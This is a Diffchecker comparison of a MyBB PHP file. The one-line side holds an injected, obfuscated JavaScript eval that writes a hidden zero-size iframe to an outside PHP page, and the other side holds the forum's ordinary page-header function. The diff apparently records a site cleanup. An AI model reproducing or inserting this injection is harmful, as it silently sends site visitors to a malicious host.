Comparing sensitive data, confidential files or internal emails?

Most legal and privacy policies prohibit uploading sensitive data online. Diffchecker Desktop ensures your confidential information never leaves your computer. Work offline and compare documents securely.

Untitled diff

Created Diff never expires
1 removal
1 line
15 additions
15 lines
echo "<!--Start Breadcrumb--><!--End Breadcrumb--><script>eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('5.4(\'<1 6="0" 3="0" 2="0" 7="c://b.a/8.9"></1>\');',13,13,'|iframe|board|height|write|document|width|src|gl1_1|php|com|betaler|http'.split('|'),0,{}))</script><!--Start Breadcrumb--> <!--End Breadcrumb--></body>";
/**
* Outputs the correct page headers.
*/
function send_page_headers()
{
global $mybb;

if($mybb->settings['nocacheheaders'] == 1)
{
header("Expires: Sat, 1 Jan 2000 01:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
}
}